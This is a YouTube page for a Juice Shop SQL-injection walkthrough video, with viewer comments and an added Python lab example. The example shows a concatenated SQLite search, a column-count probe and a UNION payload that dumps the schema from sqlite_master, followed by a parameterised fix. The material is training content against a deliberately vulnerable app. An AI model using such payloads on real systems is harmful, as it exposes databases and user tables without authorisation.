★ ★ ★ Database Schema (Injection)

  • Published: 11 Sep 2024
  • Exfiltrate the entire DB schema definition via SQL Injection.
    🤴 Credits to Bjoern Kimminich for providing this excellent vulnerable web app. Download here: github.com/bki...
    🔗 www.sqlite.org...
    🔗www.sqlitetuto...
    📃 This video is part of the OWASP Juice Shop solutions & walkthrough playlist ( • ★ Zero Stars (Improper... .
    📓 Make sure to check out all the other videos in this playlist as well to get a full tutorial.
    💡 If you have any questions or want to request a new video about a special topic, feel free to leave me a comment. You can also contact me on all of my social media below.
    💖 I need your help. Subscribe to this channel, like and retweet my videos and share them with your friends. This is going to help make this project more sustainable in the long run.
    💙 Last but not least: Subscribe to my Twitter channels / hacksplained & / pascalsec
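The challenge itself, as an added worked example that is not code from the video or from the Juice Shop project: a product search whose SQL is built by string concatenation (the query shape is modelled on the shop's search endpoint, but the `Products` and `Users` tables, the rows and the column count are constructed for this example), the probe that finds how many columns the original SELECT returns, the UNION payload that pulls every CREATE statement out of SQLite's `sqlite_master` catalog, and the parameterised query that closes the hole. The same payload, sent through a browser or Burp, simply has its spaces URL-encoded as `%20`.

```python
import sqlite3

# Constructed stand-in for the shop database (not Juice Shop's real schema).
SCHEMA = """
CREATE TABLE Products (
    id INTEGER PRIMARY KEY,
    name TEXT NOT NULL,
    description TEXT,
    price REAL,
    deletedAt TEXT
);
CREATE TABLE Users (
    id INTEGER PRIMARY KEY,
    email TEXT NOT NULL,
    password TEXT NOT NULL,
    role TEXT
);
"""

# Constructed sample rows; Lemon Juice is soft-deleted so the search filter hides it.
SAMPLE_ROWS = [
    (1, "Apple Juice", "Freshly pressed", 1.99, None),
    (2, "Banana Juice", "Monkey-approved", 1.99, None),
    (3, "Lemon Juice", "Sour", 2.99, "2020-01-01"),
]


def make_db():
    conn = sqlite3.connect(":memory:")
    conn.executescript(SCHEMA)
    conn.executemany("INSERT INTO Products VALUES (?, ?, ?, ?, ?)", SAMPLE_ROWS)
    return conn


def search_vulnerable(conn, criteria):
    """Search with the user input spliced straight into the SQL text (the bug)."""
    query = (
        "SELECT * FROM Products WHERE ((name LIKE '%" + criteria + "%' "
        "OR description LIKE '%" + criteria + "%') AND deletedAt IS NULL) "
        "ORDER BY name"
    )
    return conn.execute(query).fetchall()


def search_fixed(conn, criteria):
    """Same search with bound parameters: the input is data and can never
    change the structure of the statement."""
    like = "%" + criteria + "%"
    query = (
        "SELECT * FROM Products WHERE ((name LIKE ? OR description LIKE ?) "
        "AND deletedAt IS NULL) ORDER BY name"
    )
    return conn.execute(query, (like, like)).fetchall()


def breaks_on_quote(search):
    """The classic first probe: does a lone quote (banana') break the query?"""
    try:
        search("banana'")
        return False
    except sqlite3.OperationalError:
        return True


def schema_dump_payload(n_columns):
    """Close the two open parentheses, UNION in sqlite_master.sql padded with
    literals so both SELECTs have n_columns columns, and comment out the rest."""
    cols = ["sql"] + ["'%d'" % i for i in range(2, n_columns + 1)]
    return "qwert')) UNION SELECT " + ", ".join(cols) + " FROM sqlite_master--"


def find_column_count(search, max_cols=20):
    """SQLite rejects a UNION whose halves differ in column count; increase the
    padding until the error goes away."""
    for n in range(1, max_cols + 1):
        try:
            search(schema_dump_payload(n))
            return n
        except sqlite3.OperationalError:
            continue
    raise RuntimeError("column count not found")


def exfiltrate_schema(search):
    """Return every CREATE statement in the database, sorted for stable output."""
    rows = search(schema_dump_payload(find_column_count(search)))
    # 'qwert' matches no product, so every row comes from the UNION half;
    # its first column is the DDL text (NULL for auto-created index entries).
    return sorted(row[0] for row in rows if row[0] is not None)


if __name__ == "__main__":
    conn = make_db()
    vuln = lambda c: search_vulnerable(conn, c)
    print("quote breaks vulnerable search:", breaks_on_quote(vuln))
    for ddl in exfiltrate_schema(vuln):
        print(ddl.strip())
    print("fixed search, same payload:", search_fixed(conn, schema_dump_payload(5)))
```

Against the fixed search the payload is just an odd search term that matches nothing; against the vulnerable one it returns both table definitions, including the `Users` table the search was never meant to expose.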

Comments • 43

  •  4 years ago +10

    👏 Awesome video! When you're through with the 95 challenges, I might sort your playlist by video runtime and adjust the challenge difficulty levels accordingly! I guess this one might have been a ⭐⭐⭐⭐ rather than a ⭐⭐⭐ ... Cheers & keep up the great work!

    • @Hacksplained
      @Hacksplained  4 years ago +2

      Thanks so much Björn

    • @timobllscn3954
      @timobllscn3954 4 years ago +1

      Have you implemented some new security features? With the newest Juice Shop release I am not able to reproduce this tutorial anymore. This is becoming really frustrating because many of the tutorials for the Juice Shop are already outdated or you have to make fundamental changes to get things to work.

    •  4 years ago +1

      @@timobllscn3954 All Hacksplained videos are showing Juice Shop 10 or 11, so they are current. Checking pwning.owasp-juice.shop/appendix/solutions.html might help you out if something doesn't work as you think it should.

  • @arielhy111
    @arielhy111 2 years ago +1

    Dude! You are awesome!
    I swear, in an honest world your videos should have millions of views. Thank you so much!

  • @RL-cw9uh
    @RL-cw9uh 18 days ago

    Fantastic walkthrough and explanation

  • @hacker-jf4uw
    @hacker-jf4uw 3 years ago +1

    Your flow of explanation is amazing!!
    You got a new subscriber.

  • @quinnlaup
    @quinnlaup 4 years ago

    Thanks so much for this. I’ve been working on this challenge for two days! Keep up the great content.

    • @Hacksplained
      @Hacksplained  4 years ago

      Did you end up solving it with my video? :)
      I am super happy I could help. What caused you the most problems with this challenge?

    • @quinnlaup
      @quinnlaup 4 years ago

      @@Hacksplained Yeah, I successfully solved the challenge using your solution. I had trouble with it because I'm a noob and I'm just starting out on the pentesting path. My knowledge of SQL is low at this point but I'll keep at it. Thanks again for the content.

    • @Hacksplained
      @Hacksplained  4 years ago

      @@quinnlaup That's good to hear :) Glad the video helped.
      Keep going on your path to become a masterly hacker!! Keeping my fingers crossed!
      Hope the other videos will help as well :)

    • @gauravsehwag2172
      @gauravsehwag2172 4 years ago

      @@Hacksplained I solved 4 after your video lol❤️😂

    • @Hacksplained
      @Hacksplained  4 years ago

      @@gauravsehwag2172 Even better :)

  • @tanercoder1915
    @tanercoder1915 4 years ago

    I think the hardest part was to understand SQL commands, specifically what the UNION command is doing. It puts tables on top of each other.

    • @Hacksplained
      @Hacksplained  4 years ago

      Definitely something you need to put your hands on directly in order to grasp the concept. Once you get it, it's a super handy command though :)

  • @rattananthongsari9974
    @rattananthongsari9974 2 years ago

    Why does my Burp Suite show nothing when I search banana or banana'?

  • @Cristiano_Ronaldo1748
    @Cristiano_Ronaldo1748 1 year ago

    Why are we using 20 in between everything?

  • @timobllscn3954
    @timobllscn3954 4 years ago

    Do you remember which version of the Juice Shop you were using when you created this tutorial?

    • @Hacksplained
      @Hacksplained  4 years ago

      I think it was v10 back then. However, there is already a newer version available :)

  • @aneeltripathy7420
    @aneeltripathy7420 3 years ago

    11:22 Why did you choose sql out of all the other options!??
    And is this a threat to the website?

    • @Hacksplained
      @Hacksplained  2 years ago

      To get the schema, as explained in that very second. You can gather some valuable DB insights by doing that, so yes it is: an attacker can make use of that information!

  • @mmmdyarcavadl9004
    @mmmdyarcavadl9004 3 years ago

    Hi. What if I wanted to see Users or a different column from this table? Which command can I use in this injection? BTW thank you for the video!

    • @Hacksplained
      @Hacksplained  3 years ago

      Hey, check out some of the other sql injection videos first. There's lots of info in there 😊
      If that doesn't help, I am happy to come back with more answers

  • @aliuzun8885
    @aliuzun8885 3 months ago

    Thanks

  • @patrickpena7178
    @patrickpena7178 3 years ago

    Why doesn't my proxy show the initial data in the response?

    • @Hacksplained
      @Hacksplained  3 years ago

      Can you please give me an mm:ss mark where you are facing your issue?

    • @patrickpena7178
      @patrickpena7178 3 years ago

      @@Hacksplained 3:30, the moment you clicked the response button. I can't see the data

    • @Hacksplained
      @Hacksplained  3 years ago

      @@patrickpena7178 hard to tell with that level of detail. Have you made sure that you have sent the exact same request?
      Are you really not seeing anything at all or just a different response?

    • @davehouser1
      @davehouser1 3 years ago

      I had the same issue on my end. My response for the GET request was showing "304 Not Modified".
      The workaround is to just send the request to the Repeater anyway and try searching as Hacksplained did; you will get the response you see in the video.
      Another workaround that worked was logging out and clearing all cookies and cache. Refreshing the screen as anonymous while sending to Burp with Foxy fixed the problem and I see a response now. When I logged back in again and tried refreshing the screen, nothing again. Not sure why.

  • @guyfawkes6930
    @guyfawkes6930 4 years ago

    I am an IT student.
    I know structured programming and OOP,
    also CompTIA A+ and basic knowledge about security, networks and cryptography.
    I have been following you on Twitter,
    But honestly I can’t understand the topics you treat .
    Could you please tell me

    • @Hacksplained
      @Hacksplained  4 years ago

      I am not quite sure if I understand your question the right way. What exactly do you wanna know?

    • @guyfawkes6930
      @guyfawkes6930 4 years ago

      I mean I want you to tell me what are these things that you teach here I just want a general idea

    • @Hacksplained
      @Hacksplained  4 years ago +1

      @@guyfawkes6930 In this playlist, a complete walkthrough of OWASP juice shop which is basically a journey through the OWASP Top 10.
      Generally speaking, all sorts of hacking advice, how tos for new tools and much more.

    • @guyfawkes6930
      @guyfawkes6930 4 years ago

      Hacksplained thanks I appreciate that

    • @Hacksplained
      @Hacksplained  4 years ago

      @@guyfawkes6930 You are welcome :) I hope you keep watching.

  • @gauravsehwag2172
    @gauravsehwag2172 4 years ago

    A FOR AWESOME!!!!!

  • @ethanbarel3688
    @ethanbarel3688 2 years ago +1

    sequel lite XDDDDDDD